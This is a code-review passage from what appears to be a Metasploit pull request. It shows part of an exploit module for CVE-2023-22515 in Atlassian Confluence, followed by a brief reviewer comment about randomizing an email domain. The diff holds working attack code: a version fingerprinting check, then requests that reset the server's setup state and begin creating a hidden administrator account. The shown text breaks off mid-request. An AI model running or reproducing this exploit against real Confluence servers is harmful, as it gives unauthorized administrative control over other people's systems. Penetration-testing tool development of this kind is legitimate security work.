modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb

```diff
@@ -0,0 +1,319 @@
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    # Ensure target is a Confluence server by identifying an expected HTTP header.
+    return CheckCode::Unknown('No \'X-Confluence-Request-Time\' header') unless res.headers.key? 'X-Confluence-Request-Time'
+
+    if res.code == 200 && res.body
+      # Pull out the version string from one of three known locations within the HTML.
+      m = res.body.match(/ajs-version-number" content="(\d+\.\d+\.\d+)"/i)
+      if m.nil?
+        m = res.body.match(/Printed by Atlassian Confluence (\d+\.\d+\.\d+)/i)
+        if m.nil?
+          m = res.body.match(%r{<span id='footer-build-information'>(\d+\.\d+\.\d+)</span>}i)
+        end
+      end
+
+      unless m.nil?
+        version = Rex::Version.new(m[1])
+
+        ranges = [
+          ['8.0.0', '8.3.2'],
+          ['8.4.0', '8.4.2'],
+          ['8.5.0', '8.5.1']
+        ]
+
+        # If we have a Confluence server within the given version ranges, it appears vulnerable.
+        ranges.each do |min, max|
+          if version.between?(Rex::Version.new(min), Rex::Version.new(max))
+            return Exploit::CheckCode::Appears("Atlassian Confluence #{version}")
+          end
+        end
+
+        # By here we know we have a confluence server, but the version found indicates it is safe.
+        return Exploit::CheckCode::Safe("Atlassian Confluence #{version}")
+      end
+    end
+
+    # By here we have identified a Confluence server, but could not get the version number to determine if it is
+    # vulnerable of not.
+    CheckCode::Detected
+  end
+
+  def exploit
+    target_endpoint = normalize_uri(target_uri.path, datastore['CONFLUENCE_TARGET_ENDPOINT'])
+
+    print_status("Setting the application configuration's setupComplete to false via endpoint: #{target_endpoint}")
+
+    # 1. Leverage CVE-2023-22515 to modify a configuration setting, allowing us to reach the /setup/* endpoints.
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => target_endpoint,
+      'vars_post' => {
+        'bootstrapStatusProvider.applicationConfig.setupComplete' => 'false'
+      }
+    )
+
+    unless res&.code == 302 || res&.code == 200
+      fail_with(Failure::UnexpectedReply, "Unexpected reply from endpoint: #{target_endpoint}")
+    end
+
+    print_status('Creating a new administrator user account...')
+
+    # usernames must be lowercase
+    admin_username = rand_text_alpha_lower(8)
+    admin_password = rand_text_alphanumeric(8)
+
+    # 2. Create a new administrator user account.
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'setup', 'setupadministrator.action'),
+      'headers' => {
+        'X-Atlassian-Token' => 'no-check'
+      },
+      'vars_post' => {
+        'username' => admin_username,
+        'fullName' => rand_text_alphanumeric(8),
+        'email' => "#{rand_text_alphanumeric(8)}@localhost",
```

Comment:
I think the `@localhost` part should be randomized as well. Maybe it's time to add a `rand_email_address()` helper in msf?

Reply:
resolved via [d17f065](https://github.com/rapid7/metasploit-framework/pull/18461/commits/d17f065f12e81719859d587322fde956cd291050)